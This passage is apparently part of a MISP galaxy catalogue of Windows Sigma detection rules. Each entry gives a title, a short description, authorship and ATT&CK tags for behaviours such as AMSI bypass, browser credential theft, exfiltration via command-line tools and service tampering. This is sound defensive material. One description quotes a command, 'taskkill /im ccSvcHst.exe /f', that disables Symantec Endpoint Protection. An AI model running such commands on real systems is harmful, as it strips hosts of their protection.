author Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
creation_date 2020/10/11
falsepositive ['Unlikely']
filename proc_creation_win_powershell_cmdline_reversed_strings.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

Suspicious Manipulation Of Default Accounts Via Net.EXE

Detects suspicious manipulation of default accounts such as 'administrator' and 'guest', for example enabling or disabling the accounts or changing their password.

Internal MISP references

UUID 5b768e71-86f2-4879-b448-81061cbae951 which can be used as unique global reference for Suspicious Manipulation Of Default Accounts Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/01
falsepositive ['Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium']
filename proc_creation_win_net_user_default_accounts_manipulation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']

Process Creation Using Sysnative Folder

Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns).

Internal MISP references

UUID 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab which can be used as unique global reference for Process Creation Using Sysnative Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2022/08/23
falsepositive ['Unknown']
filename proc_creation_win_susp_sysnative.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']

Arbitrary File Download Via MSEDGE_PROXY.EXE

Detects usage of "msedge_proxy.exe" to download arbitrary files.

Internal MISP references

UUID e84d89c4-f544-41ca-a6af-4b92fd38b023 which can be used as unique global reference for Arbitrary File Download Via MSEDGE_PROXY.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023/11/09
falsepositive ['Unknown']
filename proc_creation_win_msedge_proxy_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']

PUA - Crassus Execution

Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.

Internal MISP references

UUID 2c32b543-1058-4808-91c6-5b31b8bed6c5 which can be used as unique global reference for PUA - Crassus Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2023/04/17
falsepositive ['Unlikely']
filename proc_creation_win_pua_crassus.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1590.001']

Add New Download Source To Winget

Detects usage of winget to add new, additional download sources.

Internal MISP references

UUID 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 which can be used as unique global reference for Add New Download Source To Winget in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/17
falsepositive ['False positive are expected with legitimate sources']
filename proc_creation_win_winget_add_custom_source.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059']

Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS

Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine.

Internal MISP references

UUID 07aa184a-870d-413d-893a-157f317f6f58 which can be used as unique global reference for Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/08
falsepositive ['Unknown']
filename proc_creation_win_susp_gather_network_info_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.execution', 'attack.t1615', 'attack.t1059.005']

Suspicious PowerShell Parent Process

Detects suspicious or uncommon parent processes of PowerShell.

Internal MISP references

UUID 754ed792-634f-40ae-b3bc-e0448d33f695 which can be used as unique global reference for Suspicious PowerShell Parent Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Harish Segar
creation_date 2020/03/20
falsepositive ['Other scripts']
filename proc_creation_win_powershell_susp_parent_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

HackTool - SecurityXploded Execution

Detects the execution of SecurityXploded tools.

Internal MISP references

UUID 7679d464-4f74-45e2-9e01-ac66c5eb041a which can be used as unique global reference for HackTool - SecurityXploded Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/12/19
falsepositive ['Unlikely']
filename proc_creation_win_hktl_secutyxploded.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1555']

RDP Connection Allowed Via Netsh.EXE

Detects usage of the netsh command to open and allow connections to port 3389 (RDP), as seen used by the Sarwent malware.

Internal MISP references

UUID 01aeb693-138d-49d2-9403-c4f52d7d3d62 which can be used as unique global reference for RDP Connection Allowed Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sander Wiebing
creation_date 2020/05/23
falsepositive ['Legitimate administration activity']
filename proc_creation_win_netsh_fw_allow_rdp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']

HackTool - SysmonEOP Execution

Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120.

Internal MISP references

UUID 8a7e90c5-fe6e-45dc-889e-057fe4378bd9 which can be used as unique global reference for HackTool - SysmonEOP Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/12/04
falsepositive ['Unlikely']
filename proc_creation_win_hktl_sysmoneop.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['cve.2022.41120', 'attack.t1068', 'attack.privilege_escalation']

HackTool - SharpLdapWhoami Execution

Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller.

Internal MISP references

UUID d9367cbb-c2e0-47ce-bdc0-128cb6da898d which can be used as unique global reference for HackTool - SharpLdapWhoami Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/29
falsepositive ['Programs that use the same command line flags']
filename proc_creation_win_hktl_sharpldapwhoami.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']

Suspicious PowerShell Mailbox Export to Share

Detects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitations.

Internal MISP references

UUID 889719ef-dd62-43df-86c3-768fb08dc7c0 which can be used as unique global reference for Suspicious PowerShell Mailbox Export to Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/07
falsepositive ['Unknown']
filename proc_creation_win_powershell_mailboxexport_share.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration']

Imports Registry Key From a File

Detects the import of the specified file to the registry with regedit.exe.

Internal MISP references

UUID 73bba97f-a82d-42ce-b315-9182e76c57b1 which can be used as unique global reference for Imports Registry Key From a File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Oddvar Moe, Sander Wiebing, oscd.community
creation_date 2020/10/07
falsepositive ['Legitimate import of keys', 'Evernote']
filename proc_creation_win_regedit_import_keys.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1112', 'attack.defense_evasion']

Potential AMSI Bypass Using NULL Bits

Detects usage of special strings/null bits in order to potentially bypass AMSI functionality.

Internal MISP references

UUID 92a974db-ab84-457f-9ec0-55db83d7a825 which can be used as unique global reference for Potential AMSI Bypass Using NULL Bits in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/04
falsepositive ['Unknown']
filename proc_creation_win_powershell_amsi_null_bits_bypass.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Suspicious Scheduled Task Creation Involving Temp Folder

Detects the creation of scheduled tasks that involve a temporary folder and run only once.

Internal MISP references

UUID 39019a4e-317f-4ce3-ae63-309a8c6b53c5 which can be used as unique global reference for Suspicious Scheduled Task Creation Involving Temp Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/03/11
falsepositive ['Administrative activity', 'Software installation']
filename proc_creation_win_schtasks_creation_temp_folder.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1053.005']

VeeamBackup Database Credentials Dump Via Sqlcmd.EXE

Detects a dump of credentials from the VeeamBackup dbo.

Internal MISP references

UUID b57ba453-b384-4ab9-9f40-1038086b4e53 which can be used as unique global reference for VeeamBackup Database Credentials Dump Via Sqlcmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/20
falsepositive ['Unknown']
filename proc_creation_win_sqlcmd_veeam_dump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1005']

PUA - Process Hacker Execution

Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.

Internal MISP references

UUID 811e0002-b13b-4a15-9d00-a613fce66e42 which can be used as unique global reference for PUA - Process Hacker Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/10/10
falsepositive ["While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis"]
filename proc_creation_win_pua_process_hacker.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.discovery', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1622', 'attack.t1564', 'attack.t1543']

Rundll32 Registered COM Objects

Detects rundll32.exe being used to load malicious registered COM objects.

Internal MISP references

UUID f1edd233-30b5-4823-9e6a-c4171b24d316 which can be used as unique global reference for Rundll32 Registered COM Objects in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/13
falsepositive ['Legitimate use']
filename proc_creation_win_rundll32_registered_com_objects.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1546.015']

Writing Of Malicious Files To The Fonts Folder

Monitors for possible malicious files being hidden in the C:\Windows\Fonts\ location. This folder doesn't require admin privileges to be written to and executed from.

Internal MISP references

UUID ae9b0bd7-8888-4606-b444-0ed7410cb728 which can be used as unique global reference for Writing Of Malicious Files To The Fonts Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/04/21
falsepositive ['Unknown']
filename proc_creation_win_susp_hiding_malware_in_fonts_folder.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1211', 'attack.t1059', 'attack.defense_evasion', 'attack.persistence']

Potential Browser Data Stealing

Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.

Internal MISP references

UUID 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b which can be used as unique global reference for Potential Browser Data Stealing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/23
falsepositive ['Unknown']
filename proc_creation_win_susp_copy_browser_data.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.003']

Renamed NetSupport RAT Execution

Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings.

Internal MISP references

UUID 0afbd410-de03-4078-8491-f132303cb67d which can be used as unique global reference for Renamed NetSupport RAT Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/19
falsepositive ['Unknown']
filename proc_creation_win_renamed_netsupport_rat.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential MsiExec Masquerading

Detects the execution of msiexec.exe from an uncommon directory.

Internal MISP references

UUID e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144 which can be used as unique global reference for Potential MsiExec Masquerading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/11/14
falsepositive ['Unknown']
filename proc_creation_win_msiexec_masquerading.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.005']

Suspicious Outlook Child Process

Detects a suspicious process spawning from an Outlook process.

Internal MISP references

UUID 208748f7-881d-47ac-a29c-07ea84bf691d which can be used as unique global reference for Suspicious Outlook Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team
creation_date 2022/02/28
falsepositive ['Unknown']
filename proc_creation_win_office_outlook_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']

Copy From VolumeShadowCopy Via Cmd.EXE

Detects the execution of the built-in "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use).

Internal MISP references

UUID c73124a7-3e89-44a3-bdc1-25fe4df754b1 which can be used as unique global reference for Copy From VolumeShadowCopy Via Cmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
creation_date 2021/08/09
falsepositive ['Backup scenarios using the commandline']
filename proc_creation_win_cmd_shadowcopy_access.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1490']

Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp

Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.

Internal MISP references

UUID 551d9c1f-816c-445b-a7a6-7a3864720d60 which can be used as unique global reference for Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aaron Stratton
creation_date 2023/11/13
falsepositive ['Unknown']
filename proc_creation_win_office_excel_dcom_lateral_movement.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1021.003', 'attack.lateral_movement']

Suspicious Msiexec Execute Arbitrary DLL

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).

Internal MISP references

UUID 6f4191bb-912b-48a8-9ce7-682769541e6d which can be used as unique global reference for Suspicious Msiexec Execute Arbitrary DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/16
falsepositive ['Legitimate script']
filename proc_creation_win_msiexec_execute_dll.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.007']

Potential MSTSC Shadowing Activity

Detects RDP session hijacking by using MSTSC shadowing.

Internal MISP references

UUID 6ba5a05f-b095-4f0a-8654-b825f4f16334 which can be used as unique global reference for Potential MSTSC Shadowing Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/01/24
falsepositive ['Unknown']
filename proc_creation_win_mstsc_rdp_hijack_shadowing.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1563.002']

Wusa.EXE Executed By Parent Process Located In Suspicious Location

Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.

Internal MISP references

UUID ef64fc9c-a45e-43cc-8fd8-7d75d73b4c99 which can be used as unique global reference for Wusa.EXE Executed By Parent Process Located In Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/11/26
falsepositive ['Unknown']
filename proc_creation_win_wusa_susp_parent_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Schtasks Schedule Type With High Privileges

Detects scheduled task creation or modification to be run with high privileges on a suspicious schedule type.

Internal MISP references

UUID 7a02e22e-b885-4404-b38b-1ddc7e65258a which can be used as unique global reference for Suspicious Schtasks Schedule Type With High Privileges in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/31
falsepositive ['Some installers were seen using this method of creation unfortunately. Filter them in your environment']
filename proc_creation_win_schtasks_schedule_type_system.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']

Taskkill Symantec Endpoint Protection

Detects one of the possible scenarios for disabling Symantec Endpoint Protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the command taskkill /im ccSvcHst.exe /f several times, thereby killing the process belonging to the service and thus shutting down the service.

Internal MISP references

UUID 4a6713f6-3331-11ed-a261-0242ac120002 which can be used as unique global reference for Taskkill Symantec Endpoint Protection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilya Krestinichev, Florian Roth (Nextron Systems)
creation_date 2022/09/13
falsepositive ['Unknown']
filename proc_creation_win_taskkill_sep.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Potential PowerShell Obfuscation Via WCHAR

Detects suspicious encoded character syntax often used for defense evasion.

Internal MISP references

UUID e312efd0-35a1-407f-8439-b8d434b438a6 which can be used as unique global reference for Potential PowerShell Obfuscation Via WCHAR in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/07/09
falsepositive ['Unknown']
filename proc_creation_win_powershell_obfuscation_via_utf8.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1027']

Invoke-Obfuscation Via Use MSHTA

Detects obfuscated PowerShell via the use of MSHTA in scripts.

Internal MISP references

UUID ac20ae82-8758-4f38-958e-b44a3140ca88 which can be used as unique global reference for Invoke-Obfuscation Via Use MSHTA in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/08
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

Suspicious NTLM Authentication on the Printer Spooler Service

Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service.

Internal MISP references

UUID bb76d96b-821c-47cf-944b-7ce377864492 which can be used as unique global reference for Suspicious NTLM Authentication on the Printer Spooler Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Elastic (idea), Tobias Michalski (Nextron Systems)
creation_date 2022/05/04
falsepositive ['Unknown']
filename proc_creation_win_rundll32_ntlmrelay.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.credential_access', 'attack.t1212']

Suspicious File Download From File Sharing Domain Via Curl.EXE

Detects potentially suspicious file downloads from file sharing domains using curl.exe.

Internal MISP references

UUID 56454143-524f-49fb-b1c6-3fb8b1ad41fb which can be used as unique global reference for Suspicious File Download From File Sharing Domain Via Curl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/05
falsepositive ['Unknown']
filename proc_creation_win_curl_download_susp_file_sharing_domains.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Process By Web Server Process

Detects potentially suspicious processes being spawned by a web server process, which could be the result of a successfully placed web shell or exploitation.

Internal MISP references

UUID 8202070f-edeb-4d31-a010-a26c72ac5600 which can be used as unique global reference for Suspicious Process By Web Server Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/01/16
falsepositive ['Particular web applications may spawn a shell process legitimately']
filename proc_creation_win_webshell_susp_process_spawned_from_webserver.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003', 'attack.t1190']

MSExchange Transport Agent Installation

Detects the installation of an Exchange Transport Agent.

Internal MISP references

UUID 83809e84-4475-4b69-bc3e-4aad8568612f which can be used as unique global reference for MSExchange Transport Agent Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2021/06/08
falsepositive ['Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.']
filename proc_creation_win_powershell_msexchange_transport_agent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.002']

Potential Data Exfiltration Activity Via CommandLine Tools

Detects the use of various CLI utilities exfiltrating data via web requests.

Internal MISP references

UUID 7d1aaf3d-4304-425c-b7c3-162055e0b3ab which can be used as unique global reference for Potential Data Exfiltration Activity Via CommandLine Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/02
falsepositive ['Unlikely']
filename proc_creation_win_susp_data_exfiltration_via_cli.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

HackTool - KrbRelayUp Execution

Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced

Internal MISP references

UUID 12827a56-61a4-476a-a9cb-f3068f191073 which can be used as unique global reference for HackTool - KrbRelayUp Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/26
falsepositive ['Unlikely']
filename proc_creation_win_hktl_krbrelayup.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1558.003', 'attack.lateral_movement', 'attack.t1550.003']

Rundll32 Execution Without CommandLine Parameters

Detects a suspicious start of rundll32.exe without any parameters, as found in CobaltStrike beacon activity

Internal MISP references

UUID 1775e15e-b61b-4d14-a1a3-80981298085a which can be used as unique global reference for Rundll32 Execution Without CommandLine Parameters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/05/27
falsepositive ['Possible but rare']
filename proc_creation_win_rundll32_no_params.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']

Potential Binary Impersonating Sysinternals Tools

Detects binaries that use the same name as legitimate Sysinternals tools to evade detection

Internal MISP references

UUID 7cce6fc8-a07f-4d84-a53e-96e1879843c9 which can be used as unique global reference for Potential Binary Impersonating Sysinternals Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/20
falsepositive ['Unknown']
filename proc_creation_win_sysinternals_tools_masquerading.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']

LOLBAS Data Exfiltration by DataSvcUtil.exe

Detects when a user performs data exfiltration by using DataSvcUtil.exe

Internal MISP references

UUID e290b10b-1023-4452-a4a9-eb31a9013b3a which can be used as unique global reference for LOLBAS Data Exfiltration by DataSvcUtil.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger
creation_date 2021/09/30
falsepositive ['DataSvcUtil.exe being used may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567']

Potential Tampering With RDP Related Registry Keys Via Reg.EXE

Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values

Internal MISP references

UUID 0d5675be-bc88-4172-86d3-1e96a4476536 which can be used as unique global reference for Potential Tampering With RDP Related Registry Keys Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport
creation_date 2022/02/12
falsepositive ['Unknown']
filename proc_creation_win_reg_rdp_keys_tamper.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.lateral_movement', 'attack.t1021.001', 'attack.t1112']

Suspicious Windows Service Tampering

Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc., as seen in some ransomware scripts

Internal MISP references

UUID ce72ef99-22f1-43d4-8695-419dcb5d9330 which can be used as unique global reference for Suspicious Windows Service Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2022/09/01
falsepositive ['Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry']
filename proc_creation_win_susp_service_tamper.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1489']

Disable of ETW Trace

Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.

Internal MISP references

UUID a238b5d0-ce2d-4414-a676-7a531b3d13d6 which can be used as unique global reference for Disable of ETW Trace in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
creation_date 2019/03/22
falsepositive ['Unknown']
filename proc_creation_win_susp_etw_trace_evasion.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070', 'attack.t1562.006', 'car.2016-04-002']

Potential Crypto Mining Activity

Detects command line parameters or strings often used by crypto miners

Internal MISP references

UUID 66c3b204-9f88-4d0a-a7f7-8a57d521ca55 which can be used as unique global reference for Potential Crypto Mining Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/10/26
falsepositive ['Legitimate use of crypto miners', 'Some build frameworks']
filename proc_creation_win_susp_crypto_mining_monero.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1496']

Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE

Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall

Internal MISP references

UUID a35f5a72-f347-4e36-8895-9869b0d5fc6d which can be used as unique global reference for Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
creation_date 2020/05/25
falsepositive ['Unknown']
filename proc_creation_win_netsh_fw_allow_program_in_susp_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']

HackTool - PurpleSharp Execution

Detects the execution of the PurpleSharp adversary simulation tool

Internal MISP references

UUID ff23ffbc-3378-435e-992f-0624dcf93ab4 which can be used as unique global reference for HackTool - PurpleSharp Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/06/18
falsepositive ['Unlikely']
filename proc_creation_win_hktl_purplesharp_indicators.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.t1587', 'attack.resource_development']

Suspicious Usage Of ShellExec_RunDLL

Detects suspicious usage of the ShellExec_RunDLL function to launch other commands, as seen in the Raspberry Robin attack

Internal MISP references

UUID d87bd452-6da1-456e-8155-7dc988157b7d which can be used as unique global reference for Suspicious Usage Of ShellExec_RunDLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/01
falsepositive ['Unknown']
filename proc_creation_win_rundll32_susp_shellexec_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Suspicious MSHTA Child Process

Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution

Internal MISP references

UUID 03cc0c25-389f-4bf8-b48d-11878079f1ca which can be used as unique global reference for Suspicious MSHTA Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Haag
creation_date 2019/01/16
falsepositive ['Printer software / driver installations', 'HP software']
filename proc_creation_win_mshta_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.005', 'car.2013-02-003', 'car.2013-03-001', 'car.2014-04-003']

PUA - CleanWipe Execution

Detects the use of CleanWipe, a tool usually used to remove Symantec antivirus.

Internal MISP references

UUID f44800ac-38ec-471f-936e-3fa7d9c53100 which can be used as unique global reference for PUA - CleanWipe Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/18
falsepositive ['Legitimate administrative use (Should be investigated either way)']
filename proc_creation_win_pua_cleanwipe.yml
level high
